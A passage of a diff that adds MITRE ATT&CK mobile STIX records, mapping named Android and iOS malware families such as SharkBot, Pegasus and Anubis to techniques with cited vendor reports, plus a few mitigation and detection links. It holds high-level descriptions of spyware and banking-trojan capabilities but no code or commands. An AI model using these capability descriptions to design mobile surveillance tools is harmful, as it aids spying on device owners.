"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList - ViceLeaker 2019", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/", + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. Retrieved November 21, 2019." 
+ } + ], + "modified": "2019-11-21T16:42:48.497Z", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) can take photos from both the front and back cameras.(Citation: SecureList - ViceLeaker 2019)", + "relationship_type": "uses", + "source_ref": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9f9a0349-ca95-4bde-8d8d-af524ce19bc7", + "created": "2022-04-15T16:00:43.483Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecureList DVMap June 2017", + "description": "R. Unuchek. (2017, June 8). Dvmap: the first Android malware with code injection. Retrieved December 10, 2019.", + "url": "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:52:33.829Z", + "description": "[Dvmap](https://attack.mitre.org/software/S0420) can turn off `VerifyApps`, and can grant Device Administrator permissions via commands only, rather than using the UI.(Citation: SecureList DVMap June 2017)", + "relationship_type": "uses", + "source_ref": "malware--22b596a6-d288-4409-8520-5f2846f85514", + "target_ref": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fa1da6db-da32-45d2-98a8-6bbe153166da", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-EnterpriseApps", + "description": "Lookout. (2016, May 25). 5 active mobile threats spoofing enterprise apps. Retrieved December 19, 2016.", + "url": "https://blog.lookout.com/blog/2016/05/25/spoofed-apps/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[AndroRAT](https://attack.mitre.org/software/S0292) tracks the device location.(Citation: Lookout-EnterpriseApps)", + "relationship_type": "uses", + "source_ref": "malware--a3dad2be-ce62-4440-953b-00fbce7aba93", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--c8559423-10b0-4d5e-9057-65cbfd7ee1c0", + "type": "relationship", + "created": "2021-10-01T14:42:48.728Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021." 
+ } + ], + "modified": "2021-10-01T14:42:48.728Z", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can send an SMS message after the device boots, messages containing logs, messages to adversary-specified numbers with custom content, and can delete all SMS messages on the device.(Citation: SecureList BusyGasper)", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--e5113d45-05bd-499f-a2e0-9edc6d7c03b6", + "created": "2020-09-14T13:35:45.911Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "ESET-Twitoor", + "url": "http://www.welivesecurity.com/2016/08/24/first-twitter-controlled-android-botnet-discovered/", + "description": "ESET. (2016, August 24). First Twitter-controlled Android botnet discovered. Retrieved December 22, 2016." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Twitoor](https://attack.mitre.org/software/S0302) can be controlled via Twitter.(Citation: ESET-Twitoor)", + "modified": "2022-04-20T17:56:24.292Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--41e3fd01-7b83-471f-835d-d2b1dc9a770c", + "target_ref": "attack-pattern--d916f176-a1ca-4a78-9fdd-4058bc28162e", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--02e4aedc-0674-4598-948b-0a32758af9ca", + "created": "2022-04-01T13:14:43.195Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-01T13:14:43.195Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--79eec66a-9bd0-4a3f-ac82-19159e94bd44", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--834c9a7e-6520-486d-ba60-c3a8b2f9eb1a", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "TrendMicro-XLoader", + "description": "Lorin Wu. (2018, April 19). XLoader Android Spyware and Banking Trojan Distributed via DNS Spoofing. 
Retrieved July 6, 2018.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:28:46.820Z", + "description": "[XLoader for Android](https://attack.mitre.org/software/S0318) collects SMS messages.(Citation: TrendMicro-XLoader)", + "relationship_type": "uses", + "source_ref": "malware--2740eaf6-2db2-4a40-a63f-f5b166c7059c", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6a715733-cde6-4903-b967-35562b584c6f", + "type": "relationship", + "created": "2020-06-02T14:32:31.878Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Project Zero Insomnia", + "url": "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html", + "description": "I. Beer. (2019, August 29). Implant Teardown. Retrieved June 2, 2020." 
+ } + ], + "modified": "2020-06-02T14:32:31.878Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) can obtain a list of installed non-Apple applications.(Citation: Google Project Zero Insomnia)", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--52f7e464-db89-4201-aea8-38d9b44bbd1b", + "type": "relationship", + "created": "2020-12-18T20:14:47.314Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." 
+ } + ], + "modified": "2020-12-18T20:14:47.314Z", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) has utilized foreground services.(Citation: WhiteOps TERRACOTTA)", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--648f8051-1a35-46d3-b1d8-3a3f5cf2cc8e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4efa4953-7854-4144-8837-d7831ccbe35d", + "type": "relationship", + "created": "2020-04-24T17:46:31.691Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020." 
+ } + ], + "modified": "2020-04-24T17:46:31.691Z", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) can collect a list of installed applications.(Citation: SecurityIntelligence TrickMo)", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f4f4660c-6324-4da4-be2f-ac87fda85a45", + "created": "2019-09-15T15:32:17.580Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Android Notification Listeners", + "url": "https://developer.android.com/reference/android/app/admin/DevicePolicyManager#setPermittedCrossProfileNotificationListeners(android.content.ComponentName,%20java.util.List%3Cjava.lang.String%3E)", + "description": "Android. (n.d.). DevicePolicyManager. Retrieved September 15, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "On Android devices with a work profile, the `DevicePolicyManager.setPermittedCrossProfileNotificationListeners` method can be used to manage the list of applications running within the personal profile that can access notifications generated within the work profile. This policy would not affect notifications generated by the rest of the device. 
The `DevicePolicyManager.setApplicationHidden` method can be used to disable notification access for unwanted applications, but this method would also block that entire application from running.(Citation: Android Notification Listeners) ", + "modified": "2022-04-01T14:50:28.686Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--38f37e3f-1d4b-4f04-b176-1cae6d22931e", + "type": "relationship", + "created": "2020-12-14T14:52:03.310Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Sophos Red Alert 2.0", + "url": "https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/", + "description": "J. Chandraiah. (2018, July 23). Red Alert 2.0: Android Trojan targets security-seekers. Retrieved December 14, 2020." 
+ } + ], + "modified": "2020-12-14T14:52:03.310Z", + "description": "[Red Alert 2.0](https://attack.mitre.org/software/S0539) can send SMS messages.(Citation: Sophos Red Alert 2.0)", + "relationship_type": "uses", + "source_ref": "malware--6e282bbf-5f32-476a-b879-ba77eec463c8", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--086c4c17-dde7-4a1f-90d1-79eb32f3c11f", + "created": "2023-03-20T18:58:33.787Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:58:33.787Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--cbb48fa1-0677-4a07-bdbf-eda1827e52f1", + "created": "2020-10-29T17:48:27.175Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Threat Fabric Exobot", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. 
Retrieved October 29, 2020.", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:18:05.613Z", + "description": "[Exobot](https://attack.mitre.org/software/S0522) can lock the device with a password and permanently disable the screen.(Citation: Threat Fabric Exobot)", + "relationship_type": "uses", + "source_ref": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98", + "target_ref": "attack-pattern--eb6cf439-1bcb-4d10-bc68-1eed844ed7b3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--54151897-cc7e-4f92-af50-bed41ea78d92", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Kaspersky-MobileMalware", + "description": "Roman Unuchek and Victor Chebyshev. (2014, February 24). Mobile Malware Evolution: 2013. 
Retrieved December 22, 2016.", + "url": "https://securelist.com/mobile-malware-evolution-2013/58335/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:03:20.968Z", + "description": "[Trojan-SMS.AndroidOS.FakeInst.a](https://attack.mitre.org/software/S0306) uses Google Cloud Messaging (GCM) for command and control.(Citation: Kaspersky-MobileMalware)", + "relationship_type": "uses", + "source_ref": "malware--28e39395-91e7-4f02-b694-5e079c964da9", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--eba4b561-84c9-4d49-a8b8-1842c3ed94f3", + "created": "2023-02-06T19:01:39.599Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. 
Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:25:11.903Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can grant itself contact list access.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--35453bbb-c9b3-4421-8452-95efdd290d21", + "type": "relationship", + "created": "2021-01-20T16:01:19.323Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Zimperium z9", + "url": "https://blog.zimperium.com/how-zimperiums-z9-detected-unknown-mobile-malware-overlooked-by-the-av-industry/", + "description": "zLabs. (2019, November 12). How Zimperium’s z9 Detected Unknown Mobile Malware Overlooked by the AV Industry . Retrieved January 20, 2021." 
+ } + ], + "modified": "2021-01-20T16:01:19.323Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) can collect a list of running processes.(Citation: Zimperium z9)", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--12852406-87df-4892-a177-e15e81739000", + "created": "2023-03-20T18:50:14.139Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:50:14.139Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b4ef35e9-3dba-49c7-8842-a7dff403241f", + "type": "relationship", + "created": "2020-12-17T20:15:22.445Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019." 
+ } + ], + "modified": "2020-12-17T20:15:22.445Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) can access the device’s camera.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ce51f1b3-7813-4517-bbcf-7ae8abf6d2ef", + "created": "2020-07-27T14:14:56.993Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Google Security Zen", + "url": "https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html", + "description": "Siewierski, L. (2019, January 11). PHA Family Highlights: Zen and its cousins . Retrieved July 27, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Zen](https://attack.mitre.org/software/S0494) can simulate user clicks on ads.(Citation: Google Security Zen)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--22faaa56-a8ac-4292-9be6-b571b255ee40", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6d910b1c-df72-4fcb-9d9e-0bb666c9c108", + "created": "2023-03-20T18:57:17.059Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:57:17.059Z", + "description": "", + "relationship_type": "detects", + "source_ref": 
"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--afc0e8b2-2e85-4640-8517-fb2e16831082", + "created": "2023-01-18T19:45:27.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:56:03.190Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) can use a WebView with a fake log in site to capture banking credentials.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0cfbea52-d6ab-467f-97e5-8c74b332b16f", + "created": "2020-12-24T21:55:56.749Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur 
Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:41:52.454Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has hidden its app icon.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e9b262ba-1c32-40b3-8622-121b30d6df50", + "type": "relationship", + "created": "2019-10-10T15:14:57.378Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019." 
+ } + ], + "modified": "2019-10-10T15:14:57.378Z", + "description": "[Exodus](https://attack.mitre.org/software/S0405) Two can extract information on pictures from the Gallery, Chrome and SBrowser bookmarks, and the connected WiFi network's password.(Citation: SWB Exodus March 2019)", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--cce82a76-5390-473d-9e7c-9450d1509d1d", + "type": "relationship", + "created": "2020-07-15T20:20:59.314Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." 
+ } + ], + "modified": "2020-07-15T20:20:59.314Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can download its second (Loader) and third (Core) stages after the dropper is installed.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--94040d2e-3f60-423c-8a93-a83b61cafe7d", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-Pegasus", + "description": "Lookout. (2016). Technical Analysis of Pegasus Spyware. Retrieved December 12, 2016.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[Pegasus for iOS](https://attack.mitre.org/software/S0289) update and sends the location of the phone.(Citation: Lookout-Pegasus)", + "relationship_type": "uses", + "source_ref": "malware--33d9d91d-aad9-49d5-a516-220ce101ac8a", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--54dac52d-5279-407f-b7b4-5484ae90b98c", + "type": "relationship", + "created": "2021-02-17T20:43:52.402Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout FrozenCell", + "url": "https://blog.lookout.com/frozencell-mobile-threat", + 
"description": "Michael Flossman. (2017, October 5). FrozenCell: Multi-platform surveillance campaign against Palestinians. Retrieved November 11, 2020." + } + ], + "modified": "2021-02-17T20:43:52.402Z", + "description": "[FrozenCell](https://attack.mitre.org/software/S0577) has downloaded and installed additional applications.(Citation: Lookout FrozenCell)", + "relationship_type": "uses", + "source_ref": "malware--96ea1e13-d50f-45f1-b0cf-4ac9bc5a2d62", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--4896e256-fb04-403c-bbb7-2323b158a6e0", + "created": "2022-03-30T19:52:05.143Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": 